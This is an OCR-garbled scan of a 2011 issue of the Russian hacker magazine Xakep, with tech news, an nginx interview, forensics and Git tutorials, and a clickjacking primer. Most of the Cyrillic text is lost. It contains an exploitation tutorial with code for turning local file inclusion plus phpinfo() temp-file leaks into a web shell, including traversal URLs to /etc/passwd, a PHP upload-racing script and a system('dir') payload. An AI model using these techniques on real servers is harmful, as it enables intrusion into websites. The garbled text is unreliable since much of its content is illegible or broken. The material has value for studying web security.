Upload
alexey-a
View
442
Download
1
Embed Size (px)
DESCRIPTION
Xakep journal
Citation preview
: ,
- 1Pv6 - '
N'
www.epidemz.net
www.epidemz.net
www.epidemz.net
MEGANEWS SN
-
soNv ~
S 100
PlayStatio N etwok,
. S Music 8500 .
[iJ , , Sony. Sony (, GeoHot ),
, . , ,
, 7 1 PlayStation Netwok, Sony Ente r tai nment Netwo r k Sony Online Entertainment . 60 PSN/SEN SO E. , n , - .
. Sony, 0,1 % . 93 ,
, . , . , Sony ,
. , . :)
AHTBPYCMICROSOFT SECURIY ESSENTIALS
PWS:Wi32/Zbot Google Chome. . , :).
001.
,
.
, 121 .
, , . 9% .
15 ekko. ekko 30 .
WP7 105 ANDROID ((~~
Windows Phone 7
m , iOS Andoid . - - ,
. Apple Google o r a , , , . , . , Microsoftoe
. , Windows Phone 7
, Wi-Fi
, . . Microsoft , , . ,
, WP 7.5.
MEGANEWS GGL I : Ggl Buzz, Google Labs, GoogleCode Search Jaiku.
EDIFIER
Edifier
17 :
2356740 . - - .
Ed ifier AudioCady 2 IMP17) . . , US- F-,
, SD , ! US-). 17 . 2,4 RMSI
, . Ed ifier 17 AUX. ,
F-. 1300 . Edifier 17 .
, IN,S . , GPS . , . 006
MICROSOFT -
Microsoft, , . , Wld, - Rustock. Microsoft- Kelihos ! lu) 42-45 . Kelihos - . , , DDoS-aa,
>> . Microsoft >>. Microsoft ,
. Kelihos 2011 ,
. -, ,
. sikhl--
MEGANEWS , DRM .
? , !
m Vigilant Defende. Vig il ant Defende , - Deus : Human Revolut ion . , , . ,
, ,
. . , , . , 24% ,
, 25% , . , , . -
, , , $30-40 [ , Deus : Hu man Revo lution $60).
, ORM .
WEXLER.BOOK 6002. WEXLER WLR.6002, 6001 . 6.0" PEARL,
. 4 , 50- 36 . , .
- 1500 mAh, WEXLER.BOOK 6002 .
-5 990 .
008
900
. Deus : Human Revolution
.
.
eBayl ~ , , .
. (20. ,
[NATS).
, . ,
>>. , ,
. , .
. NATS , , . , .
-, .
~ ~ , PAYPALOT
. , . ,
- . PayPal , ,
2,4 3,4% . .
12/155/2011
www.epidemz.net
MEGANEWS FACEBOOK . .
RIW-2011 &,
rn : RIW -. , . ,
ESET, . ,
, Wikileaks.
. , Positive Technologies n , n >> -
. RIW-2011 .
, , RIW 2011 -
- .
, .
- RIW-2011 >> , : . !
71 / - '- 18 / , 8 /- . 010
- RIW2011, :
, , , ,
, , .
12/155/2011
www.epidemz.net
7
BUFFALO MINISTATION PLUS
6
n Buffalo's Backup Utility
n n n Windows. , n
Time Machine, n
05 .
Buffalo MiniStation Plus Manage, n -
. n :
.
12/155/ 201 1
Buffalo MiniStation
Plus n n 1 . n n n
n , .
TurboPC TurboCopy n
n n n n USB 3.0 n
n n .
nn n AES 256 . n
n n
Secue lockMoile .
USB 3.0
n USB , : , n
n , n n
n . n n :
USB.
RAMDISK RAMDISK - Buffalo
n n -
. ,
,
n n.
n .
011
www.epidemz.net
MEGANEWS THEWALLSTREET JOURNAL, Photobucket - .
n .
,
.
, , , . , dt R,
. , , , ,
. , .
. , , . , , . ,
, - . , , ,
- Mafia Was :1.
'al:~e ,t!irate :
30 - ,
30- [ ! . an
. , , . Roland OG, ,
30- iMode la $977 [ 3 0- !. ,
, , , , , ,
.
. , , , ,
- . , , , .
NGIX , 27 100 hm .
50 50
nn.
Belgacom Telenet 11 ,
n The P i a te .
RUNA CAPIAL 3 - NGINX,
. n 43
.
LibeOffice
n n Apple iOS Google Android.
012 12/155/2011
www.epidemz.net
~~ ~~ ~~~6I LTE.
1 So,t~~~--o. .. .~~ ........ _
-2d2-- .
~~ . :1
D Chaos Compute Club ICCC) . , ,
->>. , , , ,
. . , , , , . ,
, .
, , , > .
IE 9 - , Microsoft.
92% URL- 8% .
12/155/2011
S deurrig .
MEGANEWS 9TOSMAC , IPAD 2 Smat v ..
SPYEYE
~ SpyEye ... -.. - -- __ .... --
-...... .......---
1 - .... ... - 1
SpyEye SS ,
n .
Tustee , SpyEye . ,
: SMS , - . it-
, - ,
, . , - , , . : SpyEye
. , , .
, , . ,
, 51 -.
, ,
.
GS-
. . ,
"( - v 5/- .
HAKOMbTECb-DART GGL
,
- Dat ldatlag . g].
DART , , -
. JavaScipt. , D a t JavaScipt,
. , , BSD. Dat . , .
, Web lspecto Dat -. ,
Dat , - ,
. , Dat JavaScipt.
Dat Dat . Google
Dat Chome , , Google Chome 05.
: , .
, .
, . . Dat- , ,
. .
, D at - Google. 2006 Google We b Toolkit,
- Java . , , Adwods Google Wave . Google Web Toolkit .
Dat, Google ...
Dat , , . Dat
EUROPEAN SECURITYTEAM 6, , , %.
CHROME
Jt su ('rn)
GOOGLE ,
, Google , . , , Chome. , Chome Remote Desktop, -.
Windows, 05 Linux, hm-. Chome Remote Desktop - Chome. ! - , , . lno
! . - , .
Google , - ,
, . , Google Chome , -.
WebRTC IReal Time Communicationsl, - . Google , WebRTC
- , -
Chrome >
()! nn, ICOII.tepy oroporo r I'IOAIQ'IO&cn.c, IGtO{J(V '. ocryn kOt.O>IOepy' n ' OCJ'YIW.
n
n Chrome '
[1). r n n w, nepealle f Q.....-..
4615 2551 7896
n r .
. ,
. , WR Mozilla. , Goog le Mozilla , .
, Google mViw
, WebRTC. Google , Chome.
, WebRTC , : iSAC iLBC
, - Google V8 . chomium . og ,
2- libjingle, UDP Google.
PseudoTcp- libjingle, . SSL-. potobuf IPotocol Buffesl.
PARKER INGENUITY
,
12/155/2011
PARKER 5 TECHNOLOGY PARKER , .
k STH Techology , , .
, , , .
,
. k
lgeu ity k STH Technology; ,
. k lnguit :
, . ,
,
.
015
www.epidemz.net
HEADER
,
? ,~ , . . - -, Loggly, Spluk
- . . ,
, syslog/syslog-ng, . ,
-, n. -. -, . -,
. , , : - - >>. standaloe-aao Loggly, , Gaylog [www. gaylog2.og/about l,
, MongoBD
. , - Logeplica [ dklab.u/
li/dklab logeplica l. , .
? : Log eplica SSH , . , , , , , . -
. . n : syslog/syslog-ng?, Logeplica
. , n - .
? , - [ ].
-, . , [n ssh-keygen -t sal ,
[ssh-copy-id ootramachine-to-be-pulled]. Logeplica
[/etc/dklab_logeplica . conf], , - , :
016
# , destination = /var/log/cluster
# ( ) skip_destination_prefixes = /var/log : /var/lib/pgsql/data/logs
# scoreboard = /var/run/dklab_logreplica.scoreboard delay = 0. 25
# ~ user = root
# -, # [bles] /var/log/{messages,maillog} /var/log/httpd/*_log
# , [hosts] first=machinel.example.com
. - dklab_logeplica. init /etc/init .d
. /etc/init.d/dklab_logeplica stat>>, logeplica .
? , >> [ www.denwe.u l, [ logeplica
l]. :::
dklab_logreplica 1 dklab_logreplica.pl fj 100755 459 line' (402 elocl 11.112 k
usetrict; ue fcntl ~(:DE~t!l.! :tloc.kJ; use to::Select; F1le::Fat.h;
u flle::htiii.DI!; lt! /Oeu;Jpt::LoQq: u tl1~:st: :IO!S ~(Jid5_Mat :
dJrla_logreplla: ;athtr lOQ3 trc. .ultlple ~r.o~chlllt!s 1ntO ont place 1n t-elltUit.\11" . ""Ver1on: 1.10, 20110'27\n
";\\:t.or:
Co lliJasintsovl
# hacker tweets ~~ rajmj:
Facebook, . .
raDidierStevens: feelpDennisRitchie); pOennisRitchie = NULL; //:-1
El : - . , , Lisp .
raox6D6172696F: . - >.
it.ly/ l bsue . : , , Chome,
la Google). coss-oigin policy!
, , , ;).
$5000
: -
El : . , , .
, : > .
... #nomoefeebugs
JWCIII 12/155/2011
raFishermansEnemy: CISSP,
Metasploit.
rastackSmashing: -2147483647
l ntege.
: live. xakep.u/biog/Hack/2147.html .
El : . , w- . ,
.
rastamparm: Google "'
HEADER
Proof-of-Concept
, . , .
- .
, , t [tcpcypt.og ],
.
? . t . ,
>>: . - ,
. t .
, .
. t,
, , .
t?
? (github.com/ sobo/tcpcypt ) , . ,
(Windows, 05 , Linux, FeeBSD) .
: (4500 ) uselandeoa (7000 LoC).
n
, netsf. i f . , , t .
ni- : ,
70000 60000
.!!! 50000 "' 40000 fj Q) 30000
Generate random master key 20000 ~~~~~~
client server
() 10000
serve
n . .
? 79% t :).
, n.
(lntenet Daft) , , ( n : Ql.L ly/tyvGxs). ,
,
? ( n , NAT), , . ,
t - ( VPN-cepepa).
, ( 36 SSL) .
, .
- t? ,
I- . :::
19,153
tcpcrypt server
737 SSL
server
tcpcrypt : - ,
SSL 82 . tcpcrypt !
018 12 /155/ 2011
www.epidemz.net
! IGROUP i GROUP-IB,
, no . GROUP-IB.
Group-18 ,
. , .
Group-IB
n ! 2 2011 - >> I)
_ _ , ' . -k USB Flash _ ' , . dd l ) w . - ' ' , -
' .
n: ?
' ? ? - ?
LINUX n :
: :
000 >> 3 2011
: 6n -3 2011 l -
>> 000 " , -- > - ynp L ux
' 1 i\ n - .
n . - n -
1 . n n ?
? ' n 2. .. ~
oil ... ? n
w ovo
.
n n . n n n .
n n contestlagroup- ib.ru n >>
n .
! !
www.epidemz.net
COVERSTORY , , Group-18
1
, ! , DDoS,
, ...
- . ,
. ,
.
020
, , ,
.
,
, , ,
.
, ,
. !) . ,
,
,
.
,
, ,
. . 11
, . , : , . ,
, , .
2) , ,
.
. l
. , DLP . DL- . .
4) ,
-. ,
.
. ,
, , . 11 ,
, , :
, .
.
.
, , ! , IPS, DLPI. ,
12/155/ 2011
www.epidemz.net
Caine- Computer Aided INvestigative Environment
. -, .
,
.
.
21 , , , : , , , ,
, .
,
. ,
. - .
Linux:
Caine [http:Uwww.caine-live.net/l, Riplinux [ http:Uip. 7.de/cuent/l .
, CD\DVD US-, .
~
1
,
.
12/155/2011
2
, ,
~
.
3 ,
.
:
I- 8.8.8.8, 000
COVERSTORY , n , Group-IB
, ; [, ]; , . : ,
. ., 12345.
[], DVD, US-, SDHC. Seagate, 3750330NS, 1 23.
\Uss\\Dumnts\ NQ1 NQB n .tt>>.
n n Q\P 2010, 6221, n
, nn n n > n n .
, :
n [, , ] ; [, ]; n ;
n n, .
copiled options :
!
: ,
653 . MicoSDHC, n Tanscend, 16 ,
1234 567. n -
lntenet l n .
nd line: dc3dd if=/dev/sda of=/nt/iage.dd device size : 41943040 sectors (probed) sector size : 512 bytes (probed) 875462656 byt es ( 835 ) i ed ( 47.). 4 . 53218 s . 184 H/s [!!] writing to ' /nt/i.:,ge.dd': tio space left on device 886243328 l1yt es (845 ) i ed ( 4/). 4 . 63351 s . 182 H/s
i nptt t resttl t s for dev i '/dev/sda' : 1730944 sectors in 0 bad sectors replaced zeros
tt t tt t r s tt 1 t s f r f i l / n t / i g . d d : 1730152 sectors ottt
dc3dd failed at 2011-10-19 12 : 56:41 +0000
# dc3dd if=/dev/sda of=/nt/iage.dd
dc3dd 7 . 0.0 started at 2011-10-19 12:57:06 +0 copiled options : nd line: dc3dd if=/dev/sda of=/nt/iage . dd device size: 41943040 sectors Cprobed) sector size: 512 bytes (probed) 1179648 bytes 0.1 ) copied ( 07.), 1.01073 s. 1 . 1 H/s
n RIP Linux
022
, : n \COMP1\HDD1\IE US - , n
ADATA, 1234.
, : n
n n n n ;
n n, -, - . n n;
, , .
, n n n.
[, -n], n n n n, n n , n n n . , n .
:
, :
n , DL , n
. DLP, ,
n n. . n n
. n , , . ,
, , .
12 / 155/2011
www.epidemz.net
: DDOS
, :
, - - > .
-. -,
. - (], ,
.
, 5-1 . .
, .
. . , , .
,
, , : ], .
, : 1)
. 2)
. )
, .:::!:
SONY , ,
12/155/2011
"' AccessData .Eie '[re1v .d !:!\>
&611 ~ O iliii lill e "" -Evidence Tree
tQI :\ I!t System (NTFS]
]root] I!t SBadCius
SExlend SRecycle.Bin : SSecure
android ATI Documents and Settings MSOCache Perflogs Program Files Program Files (86) ProgramOata Recovery System Volume tnformation
Propertie=s'-------------:1 ~ 1
ake O.vnershi:> rue NTFS Aa:ess Control Entry
l Access SID 5-1-5-32-545 Name Users Access Mask 0012009 Execute Fie True Read Data True Wrl:e Data False Append Data False Delete False Read Pemnissions True 01ange Permissions False ake Cmershi:> False NS Aa:ess Control Entry
]
Properties l Vai.Je Inter ... ]Custom Content .. 1 For User Guide ress F1
Access Data F lmager
f .
Name CVRA526.tmp.cvr CVRA606.tmp.cvr CVRA620.tmp.cvr CVRA692.tmp.cvr CVRA853.tmp.cvr CVRAA85.tmp.cvr CVRAADO.tmp.cvr CVRAAE1.tmp.cvr CVRAB8E.tmp.cvr CVRACD4.tmp.cvr CVRB050.tmp.cvr CVRB10.tmp.cvr CVRB1B4.tmp.cvr CVRB226.tmp.cvr CVRB36A.tmp.cvr
CVRA6.tmp.cvr CVRB5BC.tmp.cvr CVRB7CF.tmp.cvr CVRB921.tmp.cvr CVRBAEl.tmp.cvr CVRBDA7.tmp.cvr
CVRBDB.tmp.cvr CVRBE20.tmp.cvr CVRBEBE.tmp.cvr CVRBEE1.tmp.cvr CVRC083.tmp.cvr CVRG4F.tmp.cvr CVRC238.tmp.cvr CVRC26.tmp.cvr
CVRCO.tmp.cvr CVRC371.tmp.cvr CVRC69C.tmp.cvr CVRC813.tmp.cvr CVRC8A1.tmp.cvr CVRC8FA.tmp.cvr CVRC9E5.tmp.cvr
:
Regular File Regular File Regular File 05.09.2011 ... Regular File 06.092011 -Regular File 27.09.2011 ... Regular File 06.09.2011 ... Regular File 18.10.2011 ... Regular File 05.09.2011 -Regular File 28.09.2011 -Regular File 05.09.2011 -Regular File 07.10.2011 ... Regular File 05.09.2011 -Regular File 19.10.2011 ... Regular File 07.10.2011 ... Regular File 12.09.2011 ... Regular File 07.09.2011 ... Regular File 14.09.2011 ... Regular File 25.08.2011 ... Regular File 06.10.2011 ... Regular File 08.09.2011 ... Regular File 23.09.2011 ... Regular File 18.10.2011 ... Regular File 12.09.2011 -Regular File 05.09.2011 ... Regular File 15.09.2011 ... Regular File 27.09.2011 ... Regular File 06.09.2011 ... Regular File 17.10.2011 ... Regular File 02.09.2011 ... Regular File 19.10.2011 ... Regular Fi le 15.09.2011 ... Regular File 27.09.2011 ... Regular File 05.09.2011 ... Regular File 25.08.2011 ... Regular File 14.09.2011 ... Regular File 05.09.2011 ...
, :
.
, ,
, ,
( ] .
.
lc ],
, .
, , , .
023
www.epidemz.net
COVER STORY
www.epidemz.net
& 1994 .
' . 2000
, 11 .
2002 ~l web-cep~ep QI ,
45 .
.
2011 $~: Ngix i . . .
~ n .
NGINX
gi
n , , 1.:;.1 ,
?
&l ~ . ,
[ ] -, 18 . 1987
, , -,
. , - .
>> , ,
, . : , Yamaha ! MSX]. , , 1. , - .
n ~ 1.:;.1 ,
?
&l ~ - AV>>,
1989-1990 . , - 100 . ,
, : , >>, >> ,
. , - . , . : , . -
, 1992- , .
1994 ,
, .
7 , 2000 .
NASDAQ, ,
.
- XXL.RU, ,
, 13 2000
.
025
www.epidemz.net
COVERSTORY
r.1 .... ?
l . ~
: , ,
, , ,- Apache. , mod_gzip
, mod_deflate, Apache 1.3.
mod_poxy. ,
, - .
mod_accel- Apache . 2001 .
r.1 .... ,
?
l , . Mod_defl~te _ ~ ,
, . , , , . 2001
-, Apache. ,
, . -
, , , , , .
Apache- , . :
Apache , . gi Apache . , , nginx .
Apache: ,
, . , - , . - , , : nginx n . ,
- 2002 nginx.
r.1 ....
? ?
l 2003 npo n ~ , , , nginx
n .
026
Rate.ee, . , , . nginx mamba.u zvuki.u, 3.
2004 ft . m.u, , ,
nginx ,
. , , ,
, , . , , . - 2004 , ft.m.u ginx.
4 2004 , ,
: 0.1.0.
r.1 NGINX .... ,
?
l ~ .
. ngix . nginx , . , , nginx,
, ,
. ,
. .
r.1 , .... , ,
?
l - ~ . ,
- . , ginx n >>,
, ,
. nginx, , . -,
n , , -, .
r.1 ~, LIGHPD .... , .
l n: ~
-, n nginx . nginx
. ,
nginx
nginx. , nginx -.
lighttpd (lighty]. - , nginx,
. - (Jan Kneschke]. , - , , .
, , . , lighttpd FastCGI. 2000-2001 , , Apache: , l, Python.
lighttpd - , FastCGI . lighttpd FastCGI . 2000 : .
r.1 ... NGINX ?
l ~ . ~ - . ng1nx
- - no FastCGI WSGI. Apache-
, nginx ,
n FastCGI. , , nginx, Apache. : nginx
, .
, ?
1 , , ~ Apache nginx? ,
, . Apache ,
- , , mod_php. , 100 , , , 100 .
: 1 , , - . 100 , , / (10 /].
, 1 . ,
12 /155/2011
www.epidemz.net
, Apache 10-20 .
, , Apache , , . , . i gi Apache, :
gi , Apache, , . gi , --
, , l
Apache, .- . .).
- , , gi
- gi ,
.
.
1 , - ~ ,
, - . Apache, gi - !- . ,
COVER STORY
r.1 : ~ NGINX.
? . ?
l , n. , ~ , ,
n . , n n , .
, : n .
, , n n n BSD,
n . nginx , . , nginx
, Rate.ee zvuki.u.
r,1 ~ NGINX? l - ~ ,
. , .
, , ,
, . .
Linu-: CentOS, Ubuntu.
, , . :
- , , , .
?
l - . ~
ng1nx - ngix,
. , , , -, .
.
gi.
- (Netcaft, 2011): 64.67%"'"'
keep-alive .
@ 15.660/ -0.07% ,
Ngix
.
8.54/ +o.s1%
gi
-. 100 000 000 000 000
2002 2004
2011 gi $3
: .
gi
87 912 .
.
2011 1.0 gi
70+ .
gi hiig!
Rate.ee - ,
gi.
8 gi
security advisoies.
3 gi
.
.
.
- gi
43 000 000
gi :
"' Ram 1!111 II.I!M
ulu .: ~WORDPRESS @
t. ic Dropox
:
.......
SOU!IS
www.epidemz.net
COVER STORY
!r!AOE IN Cfi!
i
030
R_T_T
,
- -
. , . ,
, ,
.
12/155/2011
www.epidemz.net
,
D ltel ( 2007 ]
,
S-. , , ,
1. AMD
12/155/2011
,
. ,
, . ,
. , ,
, ,
.
. ....:=--------------cvn . . ..
~IA/)~
COVERSTORY
86. ,
,
. .
, - , , - .
, , - .
, . ,
, [ l - .
, , , - . , ,
, ltel
, ...
: , , -
, , lntel. , - ? : Assemed Canada, - Assemied China.
, -
VII\OJI
'1.0 s.
-----
2. lntel
032
, , n . , , , ,
. n
: n ,
. , >>, >>,
>>, , .
, lntel . ,
5000, . , 631xESB/632xESB 1/0 Contolle Hub,
- , 2007
. , . ,
-: ,
,
. [BMCI -
. , - ,
~11"-.~ /3 ""PT'j . ..w 3 .~ ~i
, lntel .
,
. .
: lntel 5000 ,
- ,
. - lntel , ,
.
- , - , , ,
, ,
.
>> - lntel,
, >>. , .
,
COVERSTORY
, . . , . , -
. , ,
. , : , .
, .
, ltel .
, , 7, 11- ,
! -
!. , 11
, V- .
, .
11- , , , .
, , -
. , , , 11- . , !
, - ,
, . , . , ,
, - .
- - ,
, . , .
, ,
ltel, , ,
, . - .
, . , , .
-, .
, .
. ,
------------------ -------------------
, , .
, .
US-, ,
, . l. 31.
, ,- , .
-
!. . 41. - , ltel, , .
. ltel. ,
.
, .
, .
, , ,
,
. , ,
, .
, , ,
. , , . .
. . ,
, .
,
, , , , .
, , , ,
. ,
, . , , .
, . - ,
- , . , , ,
, ,
. , - , ,
-? , ?
12/155/2011
, , . , .
, [ ,
). , , , , . 86, , ,
. , ,
, . , ,
. .
, : . - ,
. -, -,
,
.
COVERSTORY poma lpomawkelagmail .co,;,l
I LFI
phpinfo[) . .
LFI-ATAKY
036
phpifoll 10% .
J!hi!,.ng! - ; bjt i/q LFI; bjy/ccFHcYphpinfoll ; it.ly/omkMVP LFI phpinfoll
RDot; it.ly/YP9LE BWMeter; bjy/eS4GxW Procmon.
. ,
, .
PERL ,
.
, , local lile i clude, ,
. . , . , , .
LFI, .
. -: , - local lile inclusion ... php.ini - , ? , - , ! LFI -aa ,
, - n.
LFI: 1. [, , . .l.
[ , !.
2. 1/apache/logs/eo.log, /va/log/access_log, // self/envion, /poc/self/cmdline, /poc/sell/ld/X !.
, , . n CG I
/ , .
3. nn [data:, php://input, php://fi l te l, allow_ul_include=On [n-0111 >= 5.2.
4. 1/tmp/sess_*./va/li/php/session/1. , .
5. . S n www-, [ ./v/sl/ maill .
12/155/2011
www.epidemz.net
tm-
, LFI (/tmp/php*, C:\tmp\php*l . / :
LFI-; phpinfo(l; - n Windows (
!; > 5.2.0.
n ( , - , !: 1. - h-n phpinfo[J,
(tmpl . 2. phpinfo[J
seed ! ! . .
(, Content-Lengthl, L
4. tm- LFI.
. . , :
http://site.com/css.php?file=style.css http:J/site.com/css.php?file= .. / . . /( . )/etc/passwd
, css.php:
n , , n , . *nix Windows:
http: 1 /si te. com/css. php?file= .. 1 .. 1 . .} .. 1 . . /etc/passwd ht tp://site.com/css.php?fi l e= .. / . . / . . / . . / .. /tmp/ http://site.com/css.php?file= .. / .. / .. / .. / .. \Windows\Temp\
12/155/2011
phpinfo
- tm -
PHPINFO() n n phpinfo[J. n
, n php.ini , n .
n : 1. upload_tmp_di-peea ,
. (NULLI, Envionment.EMP.
2. file_uploads-a n upload_tmp_di ! n n Onl. . upload_max_filesize-aca .
( 10 l, n 2 .
4. max_execution_time-acaoe n . , , n , n . :-1
5. session.seialize_handle-cepaaop . -h ( !.
, phpinfo[J n , n Vesion 5.3.8.
$_FILES n n ( RFC1867I: 1. . 2. n - .
. tm- n . 4. . 6. - . 7. nn -. 8. l nu ( ! . 9. - n , .
3, 4, 5, 6, 7 tm- , n 8 . -n $_FILES, n nn
move_uploaded_file[J. , n
n, , . n,
, cleanup. , ,
, , n . , -n ( _* ob_stat, ob_flush !, , n 8 9,
n . n
037
www.epidemz.net
COVER STORY
DOS LFI + PHPINFO[] _FILES, , . . , - ?
? . . ,
30 , , . ,
. ( + ) .
. , . . S-- file_upload php.ini.
, . phpinfo(],
tm- , , LFI , cleaup . ,
, . , ?
, LFI , . >- , . , . , , . , . :1 :
Cotet-Legth [ );
[, ------------BWvJ N Ml.
, : 1. . 2. [ ). 3. ,
.
2 , . , , , , ,
.
,
. phpinfo[l .
[phpifo.php, info.php, i.php . .), G elwaux [ ). , . . Vaiaes phpifo[)
038
PHPINFO[]
n - phpinfo(l , .
, .
, n n , phpinfoll: 1. , / , ; 2. dumnt_t-,
; 3. _lg - [ LFI); 4. safe_mode [default OFF)- ; 5. open_basedi [default mt)- ,
; 6. allow_ul_fope [default ON)- URL
; 7. allow_ul_include [default OFF) - ;
. magic_quotes_gpc [default OFF) - ;
9. egiste_globals [default OFF)- ; 10. disae_functions [default empty) -
; 11. max_execution_time [default 0)-
; 12. display_eos [default OFF) - ; 13. upload_tmp_di-y tm-. 14. [cul, sockets, zip . .); 15. : _G ET, _POST, _COOKI E,
FILES, _SERVER.
: _GET, _POST _FILES. [
phpinfo
! Administrator: C:\Windows\ System32\cmd.exe
t ~ tll ,, J ' ' ' 1 1 1, t 1 ' ' ; ~ ' ' - ~ \ ') l \.' 1' i '~ ' j 1 1 '1 ! 1' 1 ; ~ 1; "- ..,_
J { l t 1 '1' 1 f ' - ' ' ' : J 1 1 - 1:1'' '.
w
\ .TMP
= C:\Windows\Temp ( upload_tmp_dir php.ini), = php (sessio.ser.ialize_handler), = .
, Windows , :
phplAE.tmp phplAF.tmp php;t.A4~.tmp
*nix mkstemp [linux.die.net/man/3/mkstemp):
/ = / tmp,_ = php (session.seria1ize_handler), =. (seed += PID). . glibc
:
- t_ime () - gettimeofday().sec
COVER STORY
, . , , ,
-. , phpifoll , .
1000000*36 , .
. , Micosoft-IIS/7. 5 /5.3.8 .
Widows-cepepa css.php LFI:
phpinfo.php:
, tm-:
- S- - :
// Evil $file="-----------------------------XaXbXaXbXaXbXa\r\n" ; $file .="Content-Disposition: form-data; name=file" .rand(e, 100)." ; filename=\r\nfile" . rand(e, 100). ". txt\r\n" ; $file.= "Content-Type: text/plain\r\n\r\n" ; $file.= "\r\n" ; $fi:J,e.="------------------------ - ----XaXbXaXbXaXbXa\r\n" ; $post = $file; $req ="POST " .$target. " /1.8\r\ " ; $req.= "Host: " .$host. "\r\n" ; $req.= "Content-Type: multipart/form-data;
boundary=---------------------------XaXbXaXbXaXbXa\r\n"~ $req. ="Content-Length: _" . strlen($post). "\r\n" ; $req.= "Connection: Close\r\n\r\n" ; $req.= $post;
:
$tmp = '' ; $html = '' ; $sock = socket_create(AF_INET, SOCK_STREA, SOL_TCP); socket_connect($sock, $host, ); socket_write($sock, $req); while ($out = socket_read($sock, 65536 )) {
01,0
$html .= $out; if(preg_match_all( '#=> (. *)#' ,$html,$r) &&
! empty($r[e][ 2])) {
$tmp = str _replace( array ( "=> " , ' ' ), $r[e]( 2]); }
socket_close($sock);
$html phpifo, $tmp- tm-. :
$tmp_hex = $tmp; if(strpos($tmp_hex, ': ' )) {
$path = explode( ' : ' ,$tmp_hex); $tmp_hex = $path[1]; } $tmp_hex = ($tmp_hex &&
preg_match(' #php(. *)\. tmp#' ,$tmp_hex,$rd)) ? $rd[1] : '' ;
$tmp_hex seed . - . . Content-Length ! , ! :
$req = substr($req,e,strlen($req)-2); retname($host,$req);
n . , n .
$tmp_hex +1 LFI. ? , . , , , - , .
. +2, +3 . . , ,
, tm-, 1 100.
LFI . -:
ttp://site.com/css.php?file= .. / .. / .. /tmp/ php7xEkH&e=system( 'dir')
:
php expl.php step4 .. / .. / .. /tmp/php7xEkH.tmp http://site.com/s.txt
here your shell : http://site.com/8149. php
expl.php- , .
, phpinfoll . , Live, magic_quotes=o ./supe . Windows-aax , i*- BWMete . ,
- - . , . ::
12/155/2011
www.epidemz.net
Preview PCZONE
IPV6:HOWTO 50 ~ 1Pv4 .
. 1Pv6! , . I . ~
, . .
/ ? NAT 1v4-.
1Pv6,
PCZONE
5 , ves i on1, ve sion2, ve sion2a,
. ,
. , hello wold ,
. 15 ,
, - Git !
01,2
GIT? Git- ,
, Linux. : n , n n n . Git'a n .
: Git , .
, , , - . , , , , , , IDE. -
. .
Git
, , , . Linux git . ' , , n - git-osx-installe. Windows
, ) - ). Git
Windows, , , . Git . GitG Git, IDE git, , ,
. Git . commit. n. commit , ) ). n
:
git config --global user.name "Your Name" git config --global user.email "your@emai l .com"
, :
git config --global color.diff auto git config --global color.status auto git config --global color.branch auto
12 / 155/2011
www.epidemz.net
commit
n commit'a:
git commit -m "initial commit"
- > - staging commit . Git staging
. :
git commit -am 'update to index.php'
git status . . commit, ,
. , , . , ,
>, - , - .
git branch 1 git checkout n , . : n , ,
. , , . Git ,
. banch,
, , .
git branch
PCZONE
Add return ln the offset support tests lf the d ls not present ln fra ... ... meset docs
Browsecode
tlmmywll authored 2 days ago 1 parent 52afe20860 commit 969fcc16bc5ab77352407f77cd48860ca4d95434
Showing 1 changed file wlth 6 addltions and deletlons.
s rc/support . js 6
src/support. js Vlow fllo@ 969fccl
266 266 267 267 268 ~
2 269 275
'' -266,6 266,12 @@ jQuery.support (f~~ctio~() {
+ +
+ + +
+
11 Reconstruct container d document.getlementsByagName("ody") [ O]; if ( Iody ) {
/1 Return for frameset docs that don't have d 11 These tests cannot done return;
container document.createBlement ("div"); 270 ?71
276 277
container.style.cssext v + "width:O;height:O;position:static;top:O;marginop: " + conarqinop + " " ; ody.insertefore( container, ody.firstChild );
r
, banch , :
git branch experimentalBrunch
, n Git l - mst- l.
, . open souce>> , Sign Up>> . ,
n SS-. , -, ! u) Gitu-. Puic Keys>> Add anothe puiic key>>. .
n SSH , . , , . , . - l help . github . com/woking-withkey-pass-phases ) .
git clone Git , GitHub- .
, - , l, , - , ). GitHub . jQuey. Gitu-, clone URL>>. URL , l Git-
) n, clone:
git clone git : //githui:J.co!/jquery/jquery.git
Git jquery . , - n gitk -all>>.
git push .
git, . ' GitHub
I), . , -
. GitHub puiic clone URL>> , , pesonal clone URL>> . GitHub .
git remote add origin git@github . com :aburgess/My-First -GitHub-Repo.git git push origin master
. oigi pivate clone URL>>. - git-push- maste oigin l. . GitHu.
, . Gitu- .
git pull push' , git pull , . : git fetch ! ) get mege l ):
git fetch upstream master git merge upstream/master
12/155/2011
Git&GitHub:
mitsuhiko (Armin Ronacher)
lm.ti~ICI>ve-
PCZONE
CLICKJACKING: , , , : , ? ,
. ,
, -
.
.
, -
- .
: www.sectheory. com/clickjackjnq.htm: www.contextis. com/resources/ white-papers/click-klna;
~ com/201 0/paoers/ J!Z1J!!!f; www.owasp.org/ index.pho/Cijckjack ing.
. n.
CLICKJACKING? ,
. click jackig , - >> . , , ! ?
L- , : -
; L- ,
; L- ,
z - i d ex .
, L- ! ,
, iframe, , . iframe
- , .
, , iframe, SS- opaci ty
12/155/ 2011
www.epidemz.net
facebook ~
Girl who had sex with 5000 men 1 1 Uk l Wall lnfo Glrl
Securlty Oleck ,
Waningl Due to the 1ncreased number of spam ots punna extra load our srrvers. please v11fv that you are real HUMN Foflow the insrructions below to proceed.
Clitk buttons in th is orde:r. 3. 1. 2
1 2
""
z-idex. , , . , , , .
(55-- .
? clickjacking-apyo.
, , :
chtml> chl style= "text-alig:ceter" >owo yw style=" fot-size: 38;" >! r> !/> cdiv style= "z-idex:le; opacity:e; positio:absolute; top:epx; " > ciframe scrolling="no" style= "width:eepx; height:seepx;"
src= "http://www .g.com/search?q=buy+kidle+amazo" > ! - - iframe -->
href= "#" >Ka ?/>
, Bing'a.
. , - . , , , Retwit Like,
, . , .
12 /155/2011
HIXOIICA n
r
ni -i l'tOI'IHOCO lframe
anK corn
" ns.
100 200
.nn , :s n Next.
i.
, , - - ?
, -, . , , -,
- WodPess . , . - WodPess'o, ,
. , lnstall Now [, , Fiefox). . http://wordpress/wp-admin/
plugin-install.php?tab=plugin-informatio&plugin=wp-galleryremote, plugi
. , ifame
lnstall Now. - . , , [ ). . , [ zi-)
URL: http://wordpress/wp-content/plugins/.
. , ? - . -
. , 51idePress, 55- . , .
[ n ) [secuity-assessment.com ). WordPess 3.1.3 2011 .
[- l), clickjacking-aa. .
01,7
www.epidemz.net
PCZONE
(i! 11@) C:\Usrs\ ondrew\ 0 ~ C:\Usrs\ ondrew\ Dosktop\s ... L ..J WordPress.org Login Page In Frame
